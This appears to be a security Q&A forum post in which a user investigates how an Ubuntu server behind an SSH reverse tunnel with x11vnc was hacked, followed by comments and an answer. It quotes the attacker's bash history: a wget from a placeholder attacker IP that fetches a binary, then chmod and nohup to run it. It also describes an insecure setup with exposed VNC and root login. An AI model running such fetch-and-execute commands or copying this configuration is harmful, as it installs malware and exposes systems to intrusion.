# Weak points of ssh tunnel and x11 server, hack investigation

Tags: security, ssh-tunnel, hacking, x11

So, today I've been **hacked**. It's very puzzling to me how it was done, so I'm looking for experienced people to show weak points in design of my systems.

I have two servers. One is VPS with connection to internet (**server1**), second one is server inside private network (**server2**), connected to the first one via ssh reverse tunnel, exposing ports **22 (ssh)** and **5900 (x11vnc)** to the internet. Both servers are **Ubuntu 14.04**.

I use these commands to create ssh reverse tunnel (on the server2):

```
autossh -fR \*:4202:localhost:22 -N root@server1.com
autossh -fR \*:5900:localhost:5900 -N root@server1.com
```

A little more specifics about SSH configuration on my servers.

## server1

1. Allows root login
2. Has this line:

   *GatewayPorts clientspecified*

[Full configuration](http://pastie.org/private/h7lxn2gn2iw2uwynyowada)

## server2 #

1. Doesn't allow root login.
2. Uses default (stock) ssh configuration
3. I use common (batman related:) ) username with 9 characters password.

[Full configuration](http://pastie.org/private/zufrfs4ijxyluvgjr4sveg)

As for **x11**, I use this command to create x11vnc server:

```
/usr/bin/x11vnc -dontdisconnect -notruecolor -noxfixes -shared -forever -rfbport 5900 -bg -o /home/{username}/.vnc/x11vnc.log -rfbauth /home/{username}/.vnc/passwd -auth /var/lib/mdm/:0.Xauth
```

My password for VNC is pretty good.

**server1** *is being actively bruteforced*, but I don't have any evidence it was compromised.

*You can't access server2 from server1 without password.*

## HACKED!

So, today I found this in my **.bash_history** on the **server2**:

```
wget http://{HACKER_IP}:8080/heng
chmod 0755 /root/heng
chmod 0755 ./heng
/dev/null 2>&1 &
nohup ./heng > /dev/null 2>&1 &
```

{HACKER_IP} is reported by **virtualtotal** as one that distributes **Win32.Ramnit**.

**/var/log/auth.log** is clean.

**heng** process was inside my memory but wasn't on disk. I've shutdown my system so I don't have it anymore.

## Possible weak points of my configuration and usage:

1. Passwords were transmited via skype at one point.
2. I use [xshell](https://www.netsarang.com/xshell.html), and I use password manager to store passwords to my connections.
3. I use **public WI-FI** often.

## Where did I go wrong ?

How it's possible that **server2** is being compromised before **server1** ? It's lives in non-standart 4202 port and uses pretty good login/password combination.

How can I avoid this in the future ?

Comment: What internet facing services does server1 run ?

Comment: stable nginx from repo and thats it

Comment: What is the nginx serving, what technologies is it using ?

Comment: it's default installation, just default html files. i don't have any websites there. it is a clean installation. nginx is just installed, it doesn't actually serve any purpuse

Comment: What is your version of x11vnc ?

Comment: What is your libVNCserver version ?

Answer (score -2):

As far as I can tell from your setup, the VNC traffic is not encrypted. It would have been easy to keylog the session back to server2. See:

http://vncspy.sourceforge.net/

Comment: Nope. The OP connected via an SSH tunnel.

Comment: In the opening the OP says " exposing ports 22 (ssh) and 5900 (x11vnc) to the internet" which seems like a bad idea considering the ssh tunnel is set up.